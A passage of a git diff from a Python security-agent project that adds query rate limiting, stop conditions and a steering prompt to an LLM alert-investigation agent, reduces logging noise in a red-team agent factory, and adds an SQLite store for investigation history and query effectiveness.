_current_state.executed_queries.append(query_record) + + +def create_rate_limited_mcp_tool( + original_tool: Any, resilient_executor: QueryResilientExecutor | None = None +) -> Any: + """ + Wrap an MCP tool with rate limiting and resilient execution. + + The wrapper checks the global query counter BEFORE executing. + If limit is reached, returns an error message instead of executing. + This ensures the LLM sees the limit message even when batching queries. + + Features: + - Rate limiting to prevent query abuse + - Duplicate query detection + - Automatic retry with exponential backoff (via resilient executor) + - Automatic time range reduction on timeout + """ + tool_name = getattr(original_tool, "name", "") or getattr(original_tool, "__name__", "") + + # Only wrap query tools + if "query_loki" not in tool_name and "query_prometheus" not in tool_name: + return original_tool + + logger.debug(f"Wrapping MCP tool with rate limiting and resilience: {tool_name}") + + original_fn = getattr(original_tool, "fn", None) + if original_fn is None and callable(original_tool): + original_fn = original_tool + + if original_fn is None: + logger.warning(f"Could not find callable for tool {tool_name}, not wrapping") + return original_tool + + executor = resilient_executor or get_resilient_executor() + + @functools.wraps(original_fn) + async def rate_limited_wrapper(*args, **kwargs): + error_msg = _check_query_limit() + if error_msg: + logger.critical(f"🛑 Blocking query tool {tool_name} - limit reached") + return error_msg + + query_str = kwargs.get("logql") or kwargs.get("expr") or "" + if query_str: + dup_msg = _check_duplicate_query(query_str) + if dup_msg: + logger.warning(f"🔁 Blocking duplicate query: {query_str[:50]}...") + return dup_msg + + # Increment counter + _increment_query_count(tool_name) + + # Extract time parameters for resilient execution + start_time = kwargs.get("startRfc3339") or kwargs.get("start_time") or kwargs.get("start") + end_time = kwargs.get("endRfc3339") or kwargs.get("end_time") or kwargs.get("end") + + # If we have time parameters, use resilient executor + if start_time and end_time and query_str: + logger.info(f"Using resilient executor for {tool_name}") + try: + + async def query_wrapper(logql: str, start_time: str, end_time: str, **kw): + updated_kwargs = {**kwargs} + if "startRfc3339" in kwargs: + updated_kwargs["startRfc3339"] = start_time + updated_kwargs["endRfc3339"] = end_time + elif "start_time" in kwargs: + updated_kwargs["start_time"] = start_time + updated_kwargs["end_time"] = end_time + elif "start" in kwargs: + updated_kwargs["start"] = start_time + updated_kwargs["end"] = end_time + if "logql" in updated_kwargs: + updated_kwargs["logql"] = logql + elif "expr" in updated_kwargs: + updated_kwargs["expr"] = logql + return await original_fn(*args, **updated_kwargs) + + result = await executor.execute_with_resilience( + query_wrapper, + query_str, + start_time, + end_time, + ) + + # Record the query with result count + result_count = _extract_result_count(result) + _record_query(tool_name, kwargs, result_count) + + # Log resilience metadata if present + if isinstance(result, dict) and "_resilience_metadata" in result: + meta = result["_resilience_metadata"] + if meta.get("time_range_reduced"): + logger.info( + f"Query succeeded with reduced time range " + f"({meta.get('time_range_factor', 1.0) * 100:.0f}%)" + ) + if meta.get("retry_count", 0) > 0: + logger.info(f"Query succeeded after {meta['retry_count']} retries") + + return result + + except Exception as e: + logger.error(f"Resilient execution failed: {e}") + _record_query(tool_name, kwargs, result_count=0) + return { + "status": "error", + "error": str(e), + "suggestion": "Try a shorter time range or more specific filters.", + } + + # Fallback to original execution without resilience (no time params) + try: + result = await original_fn(*args, **kwargs) + result_count = _extract_result_count(result) + _record_query(tool_name, kwargs, result_count) + return result + except Exception as e: + error_str = str(e) + # Handle gRPC timeout from mcp-grafana (10s default timeout) + if "grpc" in error_str.lower() and "connection is closing" in error_str: + logger.warning(f"Query tool {tool_name} timed out (mcp-grafana 10s limit)") + _record_query(tool_name, kwargs, result_count=0) + return { + "error": "Query timed out due to mcp-grafana 10s limit. " + "Try a shorter time range (e.g., last 1 hour instead of 24 hours) " + "or add more specific label filters to reduce the query scope." + } + logger.error(f"Query tool {tool_name} failed: {e}") + _record_query(tool_name, kwargs, result_count=0) + raise + + if hasattr(original_tool, "fn"): + # It's a Tool object with a .fn attribute + original_tool.fn = rate_limited_wrapper + return original_tool + # It's a callable, just return the wrapper + rate_limited_wrapper.__name__ = tool_name + return rate_limited_wrapper + + +def _extract_result_count(result: Any) -> int | None: + """Extract result count from various result formats.""" + if isinstance(result, list): + return len(result) + if isinstance(result, dict): + if "results" in result: + return len(result.get("results", [])) + if "data" in result: + data = result.get("data", {}) + if isinstance(data, dict) and "result" in data: + streams = data.get("result", []) + if isinstance(streams, list): + total = 0 + for stream in streams: + values = stream.get("values", []) + total += len(values) if isinstance(values, list) else 0 + return total + if isinstance(result, str): + return result.count("\n") if result else 0 + return None + + +def wrap_mcp_query_tools(mcp_tools: list) -> list: + """ + Wrap all query-related MCP tools with rate limiting. + + Args: + mcp_tools: List of MCP tools from Grafana MCPClient + + Returns: + List of tools with query tools wrapped for rate limiting + """ + wrapped = [] + wrapped_count = 0 + + for tool in mcp_tools: + tool_name = getattr(tool, "name", "") or getattr(tool, "__name__", str(tool)) + + if "query_loki" in tool_name or "query_prometheus" in tool_name: + wrapped_tool = create_rate_limited_mcp_tool(tool) + wrapped.append(wrapped_tool) + wrapped_count += 1 + logger.info(f"✅ Wrapped query tool: {tool_name}") + else: + wrapped.append(tool) + + logger.info(f"Wrapped {wrapped_count} query tools with rate limiting") + return wrapped async def log_tool_usage(event: ToolStart): - """Log tool calls for observability and detect loops.""" + """Log tool calls for observability.""" + # Note: Query counting is now handled by the rate-limited wrapper (create_rate_limited_mcp_tool) + # This hook only handles logging and metrics if hasattr(event, "tool_call") and event.tool_call: tool_name = event.tool_call.name logger.info(f"🔧 Tool call: {tool_name}") dn.log_metric(f"tool_{tool_name}", 1, mode="count") - # Track if agent is stuck in query loop - if "query_loki" in tool_name or "query_prometheus" in tool_name: - _consecutive_queries.append(tool_name) - # Keep only last 5 calls - if len(_consecutive_queries) > 5: - _consecutive_queries.pop(0) - - # If last 3 calls are all queries, warn - if len(_consecutive_queries) >= 3 and all( - "query_loki" in t or "query_prometheus" in t for t in _consecutive_queries[-3:] - ): - logger.warning( - "⚠️ DETECTED QUERY LOOP: 3+ consecutive queries without recording evidence" - ) - logger.warning( - "Agent should call record_evidence() or get_combined_questions() next" - ) - elif "record_evidence" in tool_name or "get_combined_questions" in tool_name: - # Reset counter when workflow tools are called + # Clear consecutive queries on completion + if "complete_investigation" in tool_name or "escalate_investigation" in tool_name: _consecutive_queries.clear() async def log_tool_result(event: ToolEnd): - """Log tool results.""" + """Log tool results for observability.""" + # Note: Query limit enforcement is now handled by the rate-limited wrapper + # The wrapper returns an error message BEFORE execution, so the LLM sees it if hasattr(event, "tool_call") and event.tool_call: + tool_name = event.tool_call.name if hasattr(event, "error") and event.error: - logger.warning(f"❌ Tool {event.tool_call.name} failed: {event.error}") + logger.warning(f"❌ Tool {tool_name} failed: {event.error}") dn.log_metric("tool_errors", 1, mode="count") else: - logger.info(f"✅ Tool {event.tool_call.name} completed") + logger.info(f"✅ Tool {tool_name} completed") unstall_hook = retry_with_feedback( event_type=AgentStalled, feedback=( - "You seem stuck. Remember:\n" - "1. Call get_combined_questions() to get next questions\n" - "2. Execute queries in PARALLEL to answer those questions\n" - "3. Record evidence with record_evidence() for EVERY finding\n" - "4. When done, call complete_investigation() or escalate_investigation()\n\n" - "If queries return empty results, document that and try broader queries OR move forward." + "🛑 YOU ARE STUCK. You MUST call complete_investigation() NOW with ALL parameters.\n\n" + "Required parameters:\n" + "1. summary: What you found (or 'No malicious activity confirmed' if nothing)\n" + "2. attack_synopsis: Narrative of what happened chronologically\n" + "3. recommendations: List of actions to take (check alert annotations for 'response' guidance)\n\n" + "Example:\n" + "complete_investigation(\n" + " summary='Investigated DCSync alert. No matching events in time window. Confidence: Low.',\n" + " attack_synopsis='Alert triggered at [time] for potential DCSync activity. " + "Investigation found no corroborating evidence in Loki logs.',\n" + " recommendations=['Continue monitoring for Event 4662', 'Review DC access logs manually']\n" + ")\n\n" + "DO NOT make more queries. Call complete_investigation() NOW." ), ) +def max_queries_stop(max_queries: int = 5) -> StopCondition: + """Stop condition that fires after max_queries Loki/Prometheus queries.""" + from collections.abc import Sequence + + def stop(events: Sequence[AgentEvent]) -> bool: + query_count = sum( + 1 + for e in events + if isinstance(e, ToolEnd) + and hasattr(e, "tool_call") + and e.tool_call + and ("query_loki" in e.tool_call.name or "query_prometheus" in e.tool_call.name) + ) + if query_count >= max_queries: + logger.critical( + f"🛑 STOP CONDITION: Max queries ({max_queries}) reached. Forcing stop." + ) + return True + return False + + return StopCondition(stop, name="stop_on_max_queries") + + +def max_tool_calls_stop(max_calls: int = 20) -> StopCondition: + """Stop condition that fires after max_calls TOTAL tool calls without completion. + + This is a safety net to prevent infinite loops when the agent keeps calling + non-query tools (record_evidence, get_combined_questions, etc.) without + ever calling complete_investigation. + """ + from collections.abc import Sequence + + def stop(events: Sequence[AgentEvent]) -> bool: + tool_count = sum( + 1 for e in events if isinstance(e, ToolEnd) and hasattr(e, "tool_call") and e.tool_call + ) + if tool_count >= max_calls: + logger.critical( + f"🛑 STOP CONDITION: Max tool calls ({max_calls}) reached without completion. " + "Agent must call complete_investigation() or escalate_investigation()." + ) + return True + return False + + return StopCondition(stop, name="stop_on_max_tool_calls") + + def create_investigation_agent( model: str, grafana_url: str, @@ -86,7 +446,7 @@ def create_investigation_agent( mitre_client: MITREAttackClient, state: InvestigationState, grafana_mcp_tools: list | None = None, - max_steps: int = 150, + max_steps: int = 30, ) -> Agent: """ Create a configured investigation agent. @@ -103,6 +463,8 @@ def create_investigation_agent( Returns: Configured agent ready to investigate """ + set_investigation_state(state) + grafana_tools = GrafanaTools( base_url=grafana_url, api_key=grafana_api_key, @@ -110,6 +472,7 @@ def create_investigation_agent( investigation_tools = InvestigationTools() investigation_tools.set_state(state) + investigation_tools.set_mitre_client(mitre_client) question_tools = QuestionEngineTools() question_tools.set_engines(mitre_client, state) @@ -120,20 +483,27 @@ def create_investigation_agent( completion_tools = CompletionTools() completion_tools.set_state(state) - # Build tool list + loki_url = grafana_url.rstrip("/") + query_template_tools = QueryTemplateTools(loki_url=loki_url) + + learning_tools = LearningTools() + tools: list = [ grafana_tools, investigation_tools, question_tools, mitre_tools, completion_tools, + query_template_tools, + learning_tools, escalate_investigation, ] - # Add Grafana MCP tools if available if grafana_mcp_tools: logger.info(f"Adding {len(grafana_mcp_tools)} Grafana MCP tools to agent") - tools.extend(grafana_mcp_tools) + # Wrap query tools with rate limiting to prevent infinite query loops + wrapped_tools = wrap_mcp_query_tools(grafana_mcp_tools) + tools.extend(wrapped_tools) else: logger.warning( "No Grafana MCP tools available - agent will have limited query capabilities" @@ -153,6 +523,8 @@ def create_investigation_agent( stop_conditions=[ tool_use("complete_investigation"), tool_use("escalate_investigation"), + max_queries_stop(max_queries=5), # Force stop after 5 queries + max_tool_calls_stop(max_calls=20), # Force stop after 20 total tool calls ], thread=Thread(), # type: ignore[call-arg] ) diff --git a/src/ares/core/factories/red_factory.py b/src/ares/core/factories/red_factory.py index 483bb3ae..4c2b525c 100644 --- a/src/ares/core/factories/red_factory.py +++ b/src/ares/core/factories/red_factory.py @@ -1,5 +1,7 @@ """Factory for creating red team agents with presets.""" +import time + import dreadnode as dn from dreadnode.agent import Agent from dreadnode.agent.events import ( @@ -36,37 +38,95 @@ "redteam/agents/system_instructions.md.jinja" ) +# Event deduplication state +_last_event_times: dict[str, float] = {} +_last_step_number: int | None = None +_DEBOUNCE_WINDOW = 0.1 # 100ms debounce window + + +def reset_event_tracking(): + """Reset event tracking state for a new agent run.""" + global _last_event_times, _last_step_number + _last_event_times = {} + _last_step_number = None + + +def _should_log_event(event_type: str) -> bool: + """Check if event should be logged (debounce rapid duplicates).""" + now = time.time() + last_time = _last_event_times.get(event_type, 0) + if now - last_time < _DEBOUNCE_WINDOW: + return False + _last_event_times[event_type] = now + return True + async def log_step_start(event: StepStart): - """Log step start for debugging.""" - logger.info(f"📍 Step started: step_number={getattr(event, 'step_number', '?')}") + """Log step start for debugging - only when step number is meaningful.""" + global _last_step_number + step_num = getattr(event, "step_number", None) + + # Skip if no real step number or if it's the same as last logged step + if step_num is None or step_num == _last_step_number: + return + + if not _should_log_event("step_start"): + return + + _last_step_number = step_num + logger.info(f"📍 Step {step_num} started") async def log_generation_end(event: GenerationEnd): - """Log generation end with details.""" - logger.info("📍 Generation ended") - # Log the message if available - if hasattr(event, "message") and event.message: - msg = event.message - logger.info(f"📍 Message type: {type(msg).__name__}") - if hasattr(msg, "content"): - logger.info(f"📍 Message content (first 500 chars): {str(msg.content)[:500]}") - if hasattr(msg, "tool_calls") and msg.tool_calls: - logger.info(f"📍 Tool calls requested: {[tc.name for tc in msg.tool_calls]}") + """Log generation end - only when there's meaningful content.""" + # Skip empty/spurious generation events + if not hasattr(event, "message") or not event.message: + return + + msg = event.message + has_content = hasattr(msg, "content") and msg.content and str(msg.content).strip() + has_tool_calls = hasattr(msg, "tool_calls") and msg.tool_calls + + # Only log if there's actual content or tool calls + if not has_content and not has_tool_calls: + return + + if not _should_log_event("generation_end"): + return + + # Log concise summary + if has_tool_calls: + tool_names = [tc.name for tc in msg.tool_calls] + logger.info(f"🤖 Agent requesting tools: {tool_names}") + elif has_content: + content_preview = str(msg.content)[:200].replace("\n", " ") + logger.info(f"🤖 Agent: {content_preview}...") async def log_agent_error(event: AgentError): - """Log agent errors.""" + """Log agent errors - only real errors, not spurious SDK events.""" error = getattr(event, "error", None) + # Only log if there's an actual error (SDK emits AgentError with None frequently) + if error is None: + return # Silently ignore spurious events + logger.error(f"🚨 Agent error: {error}") - if hasattr(event, "traceback"): + if hasattr(event, "traceback") and event.traceback: logger.error(f"🚨 Traceback: {event.traceback}") async def log_agent_end(event: AgentEnd): - """Log agent end.""" + """Log agent end - only when there's a meaningful stop reason.""" stop_reason = getattr(event, "stop_reason", None) - logger.info(f"📍 Agent ended: stop_reason={stop_reason}") + + # Skip spurious end events with no stop reason + if stop_reason is None: + return + + if not _should_log_event("agent_end"): + return + + logger.info(f"🏁 Agent ended: {stop_reason}") async def log_tool_usage(event: ToolStart): @@ -151,6 +211,9 @@ def create_redteam_agent( Returns: Configured agent ready for penetration testing operations """ + # Reset event tracking for fresh agent run + reset_event_tracking() + # Initialize toolsets network_tools = NetworkEnumerationTools() network_tools.set_state(state) diff --git a/src/ares/core/persistence.py b/src/ares/core/persistence.py new file mode 100644 index 00000000..2fd0d833 --- /dev/null +++ b/src/ares/core/persistence.py @@ -0,0 +1,843 @@ +""" +Investigation Persistence and Learning System. + +Stores investigation results for learning and provides +similarity-based lookup for new alerts. +""" + +from __future__ import annotations + +import json +import sqlite3 +from contextlib import contextmanager +from dataclasses import dataclass, field +from datetime import datetime, timezone +from pathlib import Path +from typing import TYPE_CHECKING, Any, ClassVar + +if TYPE_CHECKING: + from collections.abc import Generator + + from ares.core.models import InvestigationState + +import dreadnode as dn +from loguru import logger + + +@dataclass +class StoredInvestigation: + """A persisted investigation record.""" + + investigation_id: str + alert_name: str + alert_fingerprint: str # Unique identifier for this alert type + severity: str + technique_id: str | None + technique_name: str | None + + # Timestamps + started_at: datetime + completed_at: datetime + duration_seconds: float + + # Results + status: str # completed, escalated, timeout, failed + evidence_count: int + highest_pyramid_level: int + techniques_identified: list[str] + + # Learning data + queries_executed: list[dict] + query_success_rate: float # % of queries that returned results + effective_queries: list[str] # Queries that produced evidence + + # Outcome assessment + is_true_positive: bool | None = None # Manual label if available + analyst_notes: str | None = None + + # Metadata + metadata: dict[str, Any] = field(default_factory=dict) + + def to_dict(self) -> dict[str, Any]: + """Convert to dictionary for storage.""" + return { + "investigation_id": self.investigation_id, + "alert_name": self.alert_name, + "alert_fingerprint": self.alert_fingerprint, + "severity": self.severity, + "technique_id": self.technique_id, + "technique_name": self.technique_name, + "started_at": self.started_at.isoformat(), + "completed_at": self.completed_at.isoformat(), + "duration_seconds": self.duration_seconds, + "status": self.status, + "evidence_count": self.evidence_count, + "highest_pyramid_level": self.highest_pyramid_level, + "techniques_identified": self.techniques_identified, + "queries_executed": self.queries_executed, + "query_success_rate": self.query_success_rate, + "effective_queries": self.effective_queries, + "is_true_positive": self.is_true_positive, + "analyst_notes": self.analyst_notes, + "metadata": self.metadata, + } + + @classmethod + def from_dict(cls, data: dict[str, Any]) -> StoredInvestigation: + """Create from dictionary.""" + return cls( + investigation_id=data["investigation_id"], + alert_name=data["alert_name"], + alert_fingerprint=data["alert_fingerprint"], + severity=data["severity"], + technique_id=data.get("technique_id"), + technique_name=data.get("technique_name"), + started_at=datetime.fromisoformat(data["started_at"]), + completed_at=datetime.fromisoformat(data["completed_at"]), + duration_seconds=data["duration_seconds"], + status=data["status"], + evidence_count=data["evidence_count"], + highest_pyramid_level=data["highest_pyramid_level"], + techniques_identified=data.get("techniques_identified", []), + queries_executed=data.get("queries_executed", []), + query_success_rate=data.get("query_success_rate", 0.0), + effective_queries=data.get("effective_queries", []), + is_true_positive=data.get("is_true_positive"), + analyst_notes=data.get("analyst_notes"), + metadata=data.get("metadata", {}), + ) + + +@dataclass +class QueryEffectiveness: + """Statistics about query effectiveness.""" + + query_pattern: str # Normalized query pattern + total_executions: int + successful_executions: int # Returned results + evidence_producing: int # Led to recorded evidence + alert_types: list[str] # Alert names where this query was used + + @property + def success_rate(self) -> float: + if self.total_executions == 0: + return 0.0 + return self.successful_executions / self.total_executions + + @property + def evidence_rate(self) -> float: + if self.total_executions == 0: + return 0.0 + return self.evidence_producing / self.total_executions + + +@dataclass +class SimilarInvestigation: + """A similar past investigation.""" + + investigation: StoredInvestigation + similarity_score: float + matching_factors: list[str] + + +class InvestigationStore: + """SQLite-backed storage for investigations. + + Provides: + - Persistence of investigation results + - Query effectiveness tracking + - Similar investigation lookup + - False positive learning + """ + + SCHEMA_VERSION = 1 + + # Table names + TABLE_INVESTIGATIONS = "investigations" + TABLE_QUERY_EFFECTIVENESS = "query_effectiveness" + TABLE_SCHEMA_INFO = "schema_info" + + # Column definitions for investigations table + INVESTIGATIONS_COLUMNS: ClassVar[list[str]] = [ + "investigation_id", + "alert_name", + "alert_fingerprint", + "severity", + "technique_id", + "technique_name", + "started_at", + "completed_at", + "duration_seconds", + "status", + "evidence_count", + "highest_pyramid_level", + "techniques_identified", + "queries_executed", + "query_success_rate", + "effective_queries", + "is_true_positive", + "analyst_notes", + "metadata", + ] + + # Schema SQL + SQL_CREATE_INVESTIGATIONS = """ + CREATE TABLE IF NOT EXISTS investigations ( + investigation_id TEXT PRIMARY KEY, + alert_name TEXT NOT NULL, + alert_fingerprint TEXT NOT NULL, + severity TEXT, + technique_id TEXT, + technique_name TEXT, + started_at TEXT NOT NULL, + completed_at TEXT NOT NULL, + duration_seconds REAL, + status TEXT NOT NULL, + evidence_count INTEGER DEFAULT 0, + highest_pyramid_level INTEGER DEFAULT 0, + techniques_identified TEXT, + queries_executed TEXT, + query_success_rate REAL DEFAULT 0.0, + effective_queries TEXT, + is_true_positive INTEGER, + analyst_notes TEXT, + metadata TEXT, + created_at TEXT DEFAULT CURRENT_TIMESTAMP + ) + """ + + SQL_CREATE_QUERY_EFFECTIVENESS = """ + CREATE TABLE IF NOT EXISTS query_effectiveness ( + query_pattern TEXT PRIMARY KEY, + total_executions INTEGER DEFAULT 0, + successful_executions INTEGER DEFAULT 0, + evidence_producing INTEGER DEFAULT 0, + alert_types TEXT, + last_used TEXT, + created_at TEXT DEFAULT CURRENT_TIMESTAMP + ) + """ + + SQL_CREATE_SCHEMA_INFO = """ + CREATE TABLE IF NOT EXISTS schema_info ( + key TEXT PRIMARY KEY, + value TEXT + ) + """ + + # Index SQL + SQL_CREATE_INDEXES: ClassVar[list[str]] = [ + "CREATE INDEX IF NOT EXISTS idx_alert_fingerprint ON investigations(alert_fingerprint)", + "CREATE INDEX IF NOT EXISTS idx_technique_id ON investigations(technique_id)", + "CREATE INDEX IF NOT EXISTS idx_alert_name ON investigations(alert_name)", + ] + + # Query SQL templates (columns are hardcoded constants, not user input) + SQL_INSERT_INVESTIGATION = """ + INSERT OR REPLACE INTO investigations ({columns}) + VALUES ({placeholders}) + """.format( # noqa: S608 + columns=", ".join(INVESTIGATIONS_COLUMNS), + placeholders=", ".join("?" * len(INVESTIGATIONS_COLUMNS)), + ) + + SQL_SELECT_INVESTIGATION = "SELECT * FROM investigations WHERE investigation_id = ?" + + SQL_SELECT_RECENT_INVESTIGATIONS = ( + "SELECT * FROM investigations ORDER BY completed_at DESC LIMIT ?" + ) + + SQL_UPDATE_LABEL = """ + UPDATE investigations SET + is_true_positive = ?, + analyst_notes = COALESCE(?, analyst_notes) + WHERE investigation_id = ? + """ + + SQL_SELECT_QUERY_EFFECTIVENESS = "SELECT * FROM query_effectiveness WHERE query_pattern = ?" + + SQL_UPDATE_QUERY_EFFECTIVENESS = """ + UPDATE query_effectiveness SET + total_executions = total_executions + 1, + successful_executions = successful_executions + ?, + evidence_producing = evidence_producing + ?, + alert_types = ?, + last_used = ? + WHERE query_pattern = ? + """ + + SQL_INSERT_QUERY_EFFECTIVENESS = """ + INSERT INTO query_effectiveness ( + query_pattern, total_executions, successful_executions, + evidence_producing, alert_types, last_used + ) VALUES (?, 1, ?, ?, ?, ?) + """ + + SQL_SELECT_EFFECTIVE_QUERIES = """ + SELECT *, + CAST(evidence_producing AS REAL) / NULLIF(total_executions, 0) as evidence_rate + FROM query_effectiveness + WHERE total_executions >= 3 + ORDER BY evidence_rate DESC + LIMIT ? + """ + + SQL_SELECT_FALSE_POSITIVE_PATTERNS = """ + SELECT + alert_name, + alert_fingerprint, + technique_id, + COUNT(*) as occurrences, + AVG(evidence_count) as avg_evidence + FROM investigations + WHERE is_true_positive = 0 + GROUP BY alert_fingerprint + HAVING COUNT(*) >= ? + ORDER BY occurrences DESC + """ + + def __init__(self, db_path: Path | str): + """Initialize the store. + + Args: + db_path: Path to SQLite database file + """ + self.db_path = Path(db_path) + self.db_path.parent.mkdir(parents=True, exist_ok=True) + self._init_schema() + + @contextmanager + def _get_connection(self) -> Generator[sqlite3.Connection, None, None]: + """Get a database connection.""" + conn = sqlite3.connect(self.db_path) + conn.row_factory = sqlite3.Row + try: + yield conn + finally: + conn.close() + + def _init_schema(self) -> None: + """Initialize database schema.""" + with self._get_connection() as conn: + cursor = conn.cursor() + + cursor.execute(self.SQL_CREATE_INVESTIGATIONS) + cursor.execute(self.SQL_CREATE_QUERY_EFFECTIVENESS) + cursor.execute(self.SQL_CREATE_SCHEMA_INFO) + + for index_sql in self.SQL_CREATE_INDEXES: + cursor.execute(index_sql) + + cursor.execute( + f"INSERT OR REPLACE INTO {self.TABLE_SCHEMA_INFO} (key, value) VALUES (?, ?)", # noqa: S608 + ("version", str(self.SCHEMA_VERSION)), + ) + + conn.commit() + + def _investigation_to_row(self, investigation: StoredInvestigation) -> tuple: + """Convert StoredInvestigation to a tuple for database insertion.""" + return ( + investigation.investigation_id, + investigation.alert_name, + investigation.alert_fingerprint, + investigation.severity, + investigation.technique_id, + investigation.technique_name, + investigation.started_at.isoformat(), + investigation.completed_at.isoformat(), + investigation.duration_seconds, + investigation.status, + investigation.evidence_count, + investigation.highest_pyramid_level, + json.dumps(investigation.techniques_identified), + json.dumps(investigation.queries_executed), + investigation.query_success_rate, + json.dumps(investigation.effective_queries), + 1 + if investigation.is_true_positive + else (0 if investigation.is_true_positive is False else None), + investigation.analyst_notes, + json.dumps(investigation.metadata), + ) + + def store_investigation(self, investigation: StoredInvestigation) -> None: + """Store an investigation. + + Args: + investigation: Investigation to store + """ + with self._get_connection() as conn: + cursor = conn.cursor() + cursor.execute(self.SQL_INSERT_INVESTIGATION, self._investigation_to_row(investigation)) + conn.commit() + logger.info(f"Stored investigation {investigation.investigation_id}") + dn.log_metric("investigations_stored", 1, mode="count") + + def get_investigation(self, investigation_id: str) -> StoredInvestigation | None: + """Retrieve an investigation by ID. + + Args: + investigation_id: Investigation ID to retrieve + + Returns: + StoredInvestigation or None if not found + """ + with self._get_connection() as conn: + cursor = conn.cursor() + cursor.execute(self.SQL_SELECT_INVESTIGATION, (investigation_id,)) + row = cursor.fetchone() + return self._row_to_investigation(row) if row else None + + def find_similar_investigations( + self, + alert_name: str | None = None, + alert_fingerprint: str | None = None, + technique_id: str | None = None, + severity: str | None = None, + limit: int = 10, + ) -> list[SimilarInvestigation]: + """Find similar past investigations. + + Args: + alert_name: Alert name to match + alert_fingerprint: Alert fingerprint to match + technique_id: MITRE technique ID to match + severity: Severity level to match + limit: Maximum number of results + + Returns: + List of SimilarInvestigation objects sorted by similarity + """ + with self._get_connection() as conn: + cursor = conn.cursor() + + conditions = [] + params = [] + + if alert_fingerprint: + conditions.append("alert_fingerprint = ?") + params.append(alert_fingerprint) + + if alert_name: + conditions.append("alert_name = ?") + params.append(alert_name) + + if technique_id: + conditions.append("technique_id = ?") + params.append(technique_id) + + if severity: + conditions.append("severity = ?") + params.append(severity) + + if not conditions: + cursor.execute(self.SQL_SELECT_RECENT_INVESTIGATIONS, (limit,)) + else: + where_clause = " OR ".join(conditions) + query = f"SELECT * FROM investigations WHERE {where_clause} ORDER BY completed_at DESC LIMIT ?" # noqa: S608 # nosec B608 + cursor.execute(query, (*params, limit * 2)) # nosec B608 + + rows = cursor.fetchall() + + similar = [] + for row in rows: + investigation = self._row_to_investigation(row) + score, factors = self._calculate_similarity( + investigation, + alert_name=alert_name, + alert_fingerprint=alert_fingerprint, + technique_id=technique_id, + severity=severity, + ) + if score > 0: + similar.append( + SimilarInvestigation( + investigation=investigation, + similarity_score=score, + matching_factors=factors, + ) + ) + + similar.sort(key=lambda x: x.similarity_score, reverse=True) + return similar[:limit] + + def _calculate_similarity( + self, + investigation: StoredInvestigation, + alert_name: str | None = None, + alert_fingerprint: str | None = None, + technique_id: str | None = None, + severity: str | None = None, + ) -> tuple[float, list[str]]: + """Calculate similarity score for an investigation. + + Returns: + Tuple of (score, list of matching factors) + """ + score = 0.0 + factors = [] + + # Fingerprint match is highest weight (same alert type) + if alert_fingerprint and investigation.alert_fingerprint == alert_fingerprint: + score += 0.5 + factors.append("same_alert_fingerprint") + + # Alert name match + if alert_name and investigation.alert_name == alert_name: + score += 0.3 + factors.append("same_alert_name") + + # Technique match + if technique_id and investigation.technique_id == technique_id: + score += 0.15 + factors.append("same_technique") + + # Severity match + if severity and investigation.severity == severity: + score += 0.05 + factors.append("same_severity") + + return score, factors + + def _row_to_investigation(self, row: sqlite3.Row) -> StoredInvestigation: + """Convert a database row to StoredInvestigation.""" + return StoredInvestigation( + investigation_id=row["investigation_id"], + alert_name=row["alert_name"], + alert_fingerprint=row["alert_fingerprint"], + severity=row["severity"], + technique_id=row["technique_id"], + technique_name=row["technique_name"], + started_at=datetime.fromisoformat(row["started_at"]), + completed_at=datetime.fromisoformat(row["completed_at"]), + duration_seconds=row["duration_seconds"], + status=row["status"], + evidence_count=row["evidence_count"], + highest_pyramid_level=row["highest_pyramid_level"], + techniques_identified=json.loads(row["techniques_identified"] or "[]"), + queries_executed=json.loads(row["queries_executed"] or "[]"), + query_success_rate=row["query_success_rate"], + effective_queries=json.loads(row["effective_queries"] or "[]"), + is_true_positive=None + if row["is_true_positive"] is None + else bool(row["is_true_positive"]), + analyst_notes=row["analyst_notes"], + metadata=json.loads(row["metadata"] or "{}"), + ) + + def update_query_effectiveness( + self, + query_pattern: str, + successful: bool, + produced_evidence: bool, + alert_type: str, + ) -> None: + """Update query effectiveness statistics. + + Args: + query_pattern: Normalized query pattern + successful: Whether query returned results + produced_evidence: Whether query led to recorded evidence + alert_type: Alert name where query was used + """ + with self._get_connection() as conn: + cursor = conn.cursor() + now = datetime.now(timezone.utc).isoformat() + + cursor.execute(self.SQL_SELECT_QUERY_EFFECTIVENESS, (query_pattern,)) + row = cursor.fetchone() + + if row: + alert_types = json.loads(row["alert_types"] or "[]") + if alert_type not in alert_types: + alert_types.append(alert_type) + + cursor.execute( + self.SQL_UPDATE_QUERY_EFFECTIVENESS, + ( + 1 if successful else 0, + 1 if produced_evidence else 0, + json.dumps(alert_types), + now, + query_pattern, + ), + ) + else: + cursor.execute( + self.SQL_INSERT_QUERY_EFFECTIVENESS, + ( + query_pattern, + 1 if successful else 0, + 1 if produced_evidence else 0, + json.dumps([alert_type]), + now, + ), + ) + + conn.commit() + + def get_effective_queries( + self, + alert_type: str | None = None, + min_evidence_rate: float = 0.3, + limit: int = 20, + ) -> list[QueryEffectiveness]: + """Get most effective queries. + + Args: + alert_type: Filter by alert type + min_evidence_rate: Minimum evidence production rate + limit: Maximum results + + Returns: + List of QueryEffectiveness objects + """ + with self._get_connection() as conn: + cursor = conn.cursor() + cursor.execute(self.SQL_SELECT_EFFECTIVE_QUERIES, (limit * 2,)) + + results = [] + for row in cursor.fetchall(): + alert_types = json.loads(row["alert_types"] or "[]") + + if alert_type and alert_type not in alert_types: + continue + + qe = QueryEffectiveness( + query_pattern=row["query_pattern"], + total_executions=row["total_executions"], + successful_executions=row["successful_executions"], + evidence_producing=row["evidence_producing"], + alert_types=alert_types, + ) + + if qe.evidence_rate >= min_evidence_rate: + results.append(qe) + + if len(results) >= limit: + break + + return results + + def get_statistics(self) -> dict[str, Any]: + """Get overall statistics. + + Returns: + Dictionary with statistics + """ + with self._get_connection() as conn: + cursor = conn.cursor() + + # Investigation stats + cursor.execute("SELECT COUNT(*) as total FROM investigations") + total_investigations = cursor.fetchone()["total"] + + cursor.execute("SELECT status, COUNT(*) as count FROM investigations GROUP BY status") + status_counts = {row["status"]: row["count"] for row in cursor.fetchall()} + + cursor.execute("SELECT AVG(evidence_count) as avg_evidence FROM investigations") + avg_evidence = cursor.fetchone()["avg_evidence"] or 0 + + cursor.execute("SELECT AVG(highest_pyramid_level) as avg_pyramid FROM investigations") + avg_pyramid = cursor.fetchone()["avg_pyramid"] or 0 + + cursor.execute("SELECT AVG(duration_seconds) as avg_duration FROM investigations") + avg_duration = cursor.fetchone()["avg_duration"] or 0 + + # Query stats + cursor.execute("SELECT COUNT(*) as total FROM query_effectiveness") + total_queries = cursor.fetchone()["total"] + + cursor.execute( + """ + 